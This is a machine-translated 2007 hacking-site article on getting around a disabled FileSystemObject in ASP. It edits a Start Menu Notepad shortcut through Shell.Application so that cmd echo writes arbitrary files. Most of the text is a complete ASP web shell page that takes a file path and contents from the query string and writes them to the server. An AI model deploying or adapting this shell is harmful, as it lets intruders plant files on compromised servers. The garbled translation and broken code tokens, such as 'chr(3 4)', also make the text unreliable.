Across the FSO WSH write file-vulnerability warning-the black bar safety net

ID MYHACK58:62200715809
Type myhack58
Reporter 佚名
Modified 2007-06-11T00:00:00


Now the code also"upgrade"it,in order to achieve a file is written,because for the disabled FSO,WSH host to write the file is indeed a difficult thing. You might ask the shell object has the write file function? Indeed in the MSDN and there is no description,however, the shell object can already exist LNK/URL/PIF file for changes,and the changes can be saved as another file name.

Can only write the CONTENTS of the file useful? Here if we use the shell object's invokeverb method to perform this LNK file, then we will not be able to write any file! Why? Because the LNK file is specified in the execution of the program is you can add the parameter then we can call cmd echo function to write the file.

Good ideas here,programming in practical problems encountered in the following:

  1. To find a everyone can be imitation to ask the LNK file. Looking for a little discovery: "C:\Documents and Settings\Default User\Start Menu\Programs\Accessories"directory under the default LNK file everyone Users by default have read permissions.

2.利用cmd.exe /c echo to write the piece when">","<",a double quotation mark,"&", etc. have special meaning can not be directly written to MUST BE in front of them Use the escape character^. In addition double quotes in vb also has a special meaning only with chr(3 4)instead.

<% path=trim(Request. querystring("path")) text=trim(Request. querystring("text")) if text<>"" & path<>"" then text=replace(text,">","^>") text=replace(text,"<","^<") text=replace(text,"&","^&") text=replace(text,chr(3 4),"^"&chr(3 4))

set shell=server. createobject("shell. application") set shellfolder=shell. namespace("C:\Documents and Settings\Default User\Start Menu\Programs\Accessories") set shellfolderitem=shellfolder. parsename("Notepad. lnk") set objshelllink =shellfolderitem. getlink objshelllink. path="cmd.exe" objshelllink. arguments="/c echo "&text&">"&path&" &&del c:\a.lnk" objshelllink. save("c:\a.lnk") shell. namespace("c:\"). items. item("a. lnk"). invokeverb end if %>

<html> <title>CZY's a shell virus ⅱ </title> <form action=shell2. asp> The path and file name:<input type=text name=path size=4 0><p> File contents:<textarea name=text rows=2 0 cols=5 0 ></textarea><p> <input type=submit value=generate file> </form> </html>